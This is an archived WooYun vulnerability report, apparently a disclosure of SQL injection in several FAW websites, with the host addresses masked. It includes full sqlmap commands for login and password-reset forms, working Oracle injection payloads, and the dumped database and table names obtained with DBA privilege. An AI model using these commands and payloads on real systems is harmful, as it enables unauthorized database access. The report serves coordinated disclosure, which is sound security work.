乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-05: 细节已通知厂商并且等待厂商处理中 2015-11-09: 厂商已经确认,细节仅向厂商公开 2015-11-19: 细节向核心白帽子及相关领域专家公开 2015-11-29: 细节向普通白帽子公开 2015-12-09: 细节向实习白帽子公开 2015-12-24: 细节向公众公开
一汽多个站点SQL注入打包
0x00 http://**.**.**.** 登录框处
sqlmap -u "http://**.**.**.**/ascm/index.jsp" --data "User=aaa&Password=sssssssssss&imageField.x=24&imageField.y=13"
Parameter: User (POST) Type: stacked queries Title: Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment) Payload: User=aaa');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(86)||CHR(76)||CHR(108),5) FROM DUAL--&Password=sssssssssss&imageField.x=24&imageField.y=13the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle
current user: 'BIS4'available databases [1]:[*] BIS4
0x01 http://**.**.**.** 重置密码处
sqlmap -u "http://**.**.**.**/QMDRP/ResetPassword" --data "j_username=aa&old_password=11111111&new_password=ssssssss&fix_password=ssssssss¤t_client=800&isDrp=true"
Parameter: current_client (POST) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: j_username=aa&old_password=11111111&new_password=ssssssss&fix_password=ssssssss¤t_client=800' AND 3938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(82)||CHR(74)||CHR(80),5) AND 'FxEl'='FxEl&isDrp=trueCurrent database[14 tables]+-----------------------+| COURSE || FOUNDTHUMBS || LINEITEM || ROLE || BINN_CT_TEMPL_ELEMS || CDB_BUDDYS || CONNEXION || ETUDIANTS || MULTASTRATEGY || NUKE_BBFORUM_PRUNE || NUKE_GALLERY_COMMENTS || OC || SAMEDICINO_GE || SETTING |+-----------------------+
0x02 **.**.**.**:9010加个单引号登录框处有防护
但是忘记密码处却疏漏了 **.**.**.**:9010/NFoundation/SYS/UpdatePassWord.aspx?报错
sqlmap -u "**.**.**.**:9010/SYSMainSF/Login" --data "UserCode=aa&PassWord=ss&token_key=&UserIp=&SessionID=&__QMWindowCode=c7c1f6a3-7c7f-986e-9545-f280880cef65&LoginState=UpdatePassWord&NewPassWord=ss&__IsAjaxRequest=True" --dbs
Parameter: UserCode (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) Payload: UserCode=aa') AND 2628=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2628=2628) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(120)||CHR(106)||CHR(113)) AND ('KRCq'='KRCq&PassWord=ss&token_key=&UserIp=&SessionID=&__QMWindowCode=c7c1f6a3-7c7f-986e-9545-f280880cef65&LoginState=UpdatePassWord&NewPassWord=ss&__IsAjaxRequest=True Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: UserCode=aa') AND 4665=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('kDPD'='kDPD&PassWord=ss&token_key=&UserIp=&SessionID=&__QMWindowCode=c7c1f6a3-7c7f-986e-9545-f280880cef65&LoginState=UpdatePassWord&NewPassWord=ss&__IsAjaxRequest=Truethe back-end DBMS is Oracleweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Oracle
DBA权限
current user: 'TDSV2_JF'available databases [15]:[*] APPQOSSYS[*] DBSNMP[*] DSG[*] JFSCM_TDS2SCM_WMS[*] JINSHUI[*] OUTLN[*] SQLTXPLAIN[*] SYS[*] SYSMAN[*] SYSTEM[*] TDS2DMS[*] TDS_P2P[*] TDSV2_JF[*] WMSYS[*] XDB
如上
提交网站运维人员进行处理
危害等级:高
漏洞Rank:10
确认时间:2015-11-09 11:07
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给吉林分中心,由吉林分中心后续协调网站管理单位处置。
暂无